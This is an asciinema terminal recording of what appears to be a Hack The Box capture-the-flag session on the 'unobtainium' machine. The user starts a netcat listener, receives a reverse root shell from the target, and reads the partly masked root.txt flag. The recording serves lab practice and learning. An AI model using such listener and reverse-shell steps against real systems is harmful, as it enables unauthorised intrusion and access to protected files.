{"version": 2, "width": 149, "height": 18, "timestamp": 1624274599, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.028422, "o", "Welcome to Parrot OS\r\n"]
[0.073552, "o", "\u001b]2;Parrot Terminal\u0007"]
[0.075243, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                    \r \r"]
[0.160083, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[31m┌[\u001b[39m\u001b[36mParrot\u001b[39m\u001b[31m]─[\u001b[39m\u001b[33m16:53-21/06\u001b[39m\u001b[31m]─[\u001b[39m\u001b[35m/home/aju/CTF/HTB/unobtainium\u001b[39m\u001b[31m]\u001b[39m\r\n\u001b[31m└╼\u001b[39m\u001b[32maju\u001b[39m\u001b[33m$\u001b[39m\u001b[K"]
[0.161474, "o", "\u001b[?1h\u001b="]
[0.162401, "o", "\u001b[?1h\u001b="]
[0.167311, "o", "\u001b[?2004h"]
[0.177835, "o", "\r\r\n\u001b[J\u001b[A\u001b[6C"]
[1.306273, "o", "\u001b[1m\u001b[31mn\u001b[0m\u001b[39m"]
[1.329561, "o", "\r\r\n\u001b[J\u001b[A\u001b[7C\b\u001b[1m\u001b[31mn\u001b[0m\u001b[39mano id_rsa\u001b[10D"]
[1.330428, "o", "\b\u001b[1m\u001b[31mn\u001b[0m\u001b[39m\u001b[90ma\u001b[90mn\u001b[90mo\u001b[90m \u001b[90mi\u001b[90md\u001b[90m_\u001b[90mr\u001b[90ms\u001b[90ma\u001b[39m\u001b[10D"]
[1.60896, "o", "\b\u001b[0m\u001b[32mn\u001b[32mc\u001b[39m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[9D"]
[1.765409, "o", "\u001b[90m -nvlp 4444\u001b[39m\u001b[11D"]
[1.766675, "o", "\r\r\n"]
[1.767201, "o", "\u001b[01;02;39mexternal command\u001b[0m\r\n\u001b[Jnc\u001b[27m              \u001b[27m  \u001b[27m\u001b[Jncrack\u001b[27m          \u001b[27m  \u001b[27m\u001b[Jnc.traditional\u001b[27m  \u001b[27m  \u001b[27m\u001b[Jncurses5-config\u001b[27m \u001b[27m  \u001b[27m\u001b[Jncurses6-config\u001b[27m \u001b[27m  \u001b[27m\u001b[Jncursesw5-config\u001b[27m  \u001b[27m\u001b[Jncursesw6-config\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C"]
[1.767435, "o", "\u001b[32mnc\u001b[39m\u001b[90m -nvlp 4444\u001b[39m\u001b[K\u001b[39m\u001b[11D"]
[2.122747, "o", "\u001b[39m "]
[2.207115, "o", "\r\r\n\u001b[J\u001b[01;02;39mhost\u001b[0m\r\n\u001b[Jip6-localhost\u001b[27m    \u001b[27m  \u001b[27m\u001b[Jip6-loopback\u001b[27m     \u001b[27m  \u001b[27m\u001b[Jlocalhost\u001b[27m        \u001b[27m  \u001b[27m\u001b[JParrot\u001b[27m           \u001b[27m  \u001b[27m\u001b[Junobtainium.htb\u001b[27m  \u001b[27m  \u001b[27m\u001b[Jwpad.realcorp.htb\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C\u001b[32mnc\u001b[39m \u001b[90m-nvlp 4444\u001b[39m\u001b[K\u001b[39m\u001b[10D"]
[3.182707, "o", "\u001b[39m-\u001b[39mn\u001b[39mv\u001b[39ml\u001b[39mp\u001b[39m \u001b[39m4\u001b[39m4\u001b[39m4\u001b[39m4"]
[3.285067, "o", "\r\r\n\u001b[J\u001b[01;02;39mhistory word\u001b[0m\r\n\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C\u001b[32mnc\u001b[39m -nvlp 4444\u001b[K\u001b[39m"]
[3.76544, "o", "\b \b"]
[3.866265, "o", "\u001b[90m4\u001b[39m\b"]
[3.866725, "o", "\r\r\n\u001b[J"]
[3.866803, "o", "\u001b[01;02;39mhistory word\u001b[0m\r\n\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C\u001b[32mnc\u001b[39m -nvlp 444\u001b[90m4\u001b[39m\u001b[K\u001b[39m\b"]
[4.788909, "o", "\u001b[39m4"]
[4.87942, "o", "\r\r\n\u001b[J\u001b[01;02;39mhistory word\u001b[0m\r\n\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C\u001b[32mnc\u001b[39m -nvlp 4444\u001b[K\u001b[39m"]
[5.745379, "o", "\b \b"]
[5.842173, "o", "\u001b[90m4\u001b[39m\b"]
[5.842699, "o", "\r\r\n\u001b[J"]
[5.842774, "o", "\u001b[01;02;39mhistory word\u001b[0m\r\n\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C"]
[5.84288, "o", "\u001b[32mnc\u001b[39m -nvlp 444\u001b[90m4\u001b[39m\u001b[K\u001b[39m\b"]
[7.298906, "o", "\u001b[39m4"]
[7.398178, "o", "\r"]
[7.398551, "o", "\r\n"]
[7.398654, "o", "\u001b[J"]
[7.398812, "o", "\u001b[01;02;39mhistory word\u001b[0m"]
[7.398905, "o", "\r\n"]
[7.398992, "o", "\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C"]
[7.399096, "o", "\u001b[32mnc\u001b[39m -nvlp 4444\u001b[K\u001b[39m"]
[8.496339, "o", "\b \b"]
[8.591915, "o", "\u001b[90m4\u001b[39m\b\r\r\n\u001b[J\u001b[01;02;39mhistory word\u001b[0m\r\n\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C\u001b[32mnc\u001b[39m -nvlp 444\u001b[90m4\u001b[39m\u001b[K\u001b[39m\b"]
[10.295993, "o", "\u001b[39m4"]
[10.379314, "o", "\r"]
[10.37988, "o", "\r\n"]
[10.379969, "o", "\u001b[J"]
[10.380284, "o", "\u001b[01;02;39mhistory word\u001b[0m\r\n\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C"]
[10.38044, "o", "\u001b[32mnc\u001b[39m -nvlp 4444\u001b[K\u001b[39m"]
[13.600775, "o", "\b \b"]
[13.686357, "o", "\u001b[90m4\u001b[39m\b"]
[13.686498, "o", "\r"]
[13.686527, "o", "\r\n"]
[13.686552, "o", "\u001b[J"]
[13.686623, "o", "\u001b[01;02;39mhistory word\u001b[0m"]
[13.686649, "o", "\r\n"]
[13.686677, "o", "\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C"]
[13.686712, "o", "\u001b[32mnc\u001b[39m -nvlp 444\u001b[90m4\u001b[39m\u001b[K\u001b[39m\b"]
[14.271499, "o", "\u001b[39m4"]
[14.349627, "o", "\r\r\n\u001b[J"]
[14.350117, "o", "\u001b[01;02;39mhistory word\u001b[0m\r\n\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C"]
[14.350273, "o", "\u001b[32mnc\u001b[39m -nvlp 4444\u001b[K\u001b[39m"]
[16.749397, "o", "\b \b"]
[16.84479, "o", "\u001b[90m4\u001b[39m\b\r\r\n\u001b[J\u001b[01;02;39mhistory word\u001b[0m\r\n\u001b[J4444\u001b[27m\u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C\u001b[32mnc\u001b[39m -nvlp 444\u001b[90m4\u001b[39m\u001b[K\u001b[39m\b"]
[18.16688, "o", "\u001b[39m6"]
[18.226112, "o", "\r\r\n\u001b[J\u001b[J\u001b[01;02;39mNo matching port, corrections, ancestor directory or history word found.\u001b[0m\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[39m\r\u001b[6C\u001b[32mnc\u001b[39m -nvlp 4446\u001b[K\u001b[39m"]
[19.08693, "o", "\u001b[?1l\u001b>"]
[19.08752, "o", "\u001b[?1l\u001b>"]
[19.087811, "o", "\u001b[?2004l\r"]
[19.087956, "o", "\r\n"]
[19.088118, "o", "\u001b[J\u001b[A\u001b[19C"]
[19.089238, "o", "\r"]
[19.089528, "o", "\r\n"]
[19.089597, "o", "\u001b[J"]
[19.089824, "o", "\u001b]0;nc -nvlp 4446 - Parrot Terminal\u0007"]
[19.093093, "o", "listening on [any] 4446 ...\r\n"]
[31.747247, "o", "connect to [10.10.14.31] from (UNKNOWN) [10.10.10.235] 37069"]
[31.747859, "o", "\r\n"]
[31.747969, "o", "/bin/sh: can't access tty; job control turned off\r\n/ # "]
[33.849149, "o", "c"]
[33.98341, "o", "d"]
[34.385492, "o", " "]
[35.089653, "o", "."]
[35.54753, "o", "e"]
[36.396689, "o", "\b \b"]
[36.575752, "o", "\b \b"]
[38.022637, "o", "/"]
[38.598383, "o", "r"]
[38.902539, "o", "o"]
[39.058012, "o", "o"]
[39.233222, "o", "t"]
[39.69514, "o", "\r\n"]
[39.934854, "o", "/root # "]
[40.784789, "o", "c"]
[41.087213, "o", "a"]
[41.434871, "o", "t"]
[41.844796, "o", " "]
[42.446872, "o", "r"]
[42.763414, "o", "o"]
[42.920949, "o", "o"]
[43.151254, "o", "t"]
[43.609283, "o", "."]
[44.831066, "o", "t"]
[45.133626, "o", "x"]
[45.271624, "o", "t"]
[45.801799, "o", "\r\n"]
[46.308278, "o", "7f295bf74e63b39*****************\r\n/root # "]
[51.379729, "o", "^C\r\n"]
[51.380547, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                    \r \r\u001b[6n"]
[51.392249, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[31m┌[\u001b[39m\u001b[36mParrot\u001b[39m\u001b[31m]─[\u001b[39m\u001b[33m16:54-21/06\u001b[39m\u001b[31m]─[\u001b[39m\u001b[35m/home/aju/CTF/HTB/unobtainium\u001b[39m\u001b[31m]\u001b[39m"]
[51.393148, "o", "\r\n"]
[51.395579, "o", "\u001b[31m└╼\u001b[39m\u001b[32maju\u001b[39m\u001b[33m$\u001b[39m\u001b[K\u001b[?1h\u001b=\u001b[?1h\u001b="]
[51.398666, "o", "\u001b[?2004h"]
[51.411298, "o", "\r\r\n\u001b[J\u001b[A\u001b[6C"]
[51.998588, "o", "\u001b[?2004l\r\r\n"]
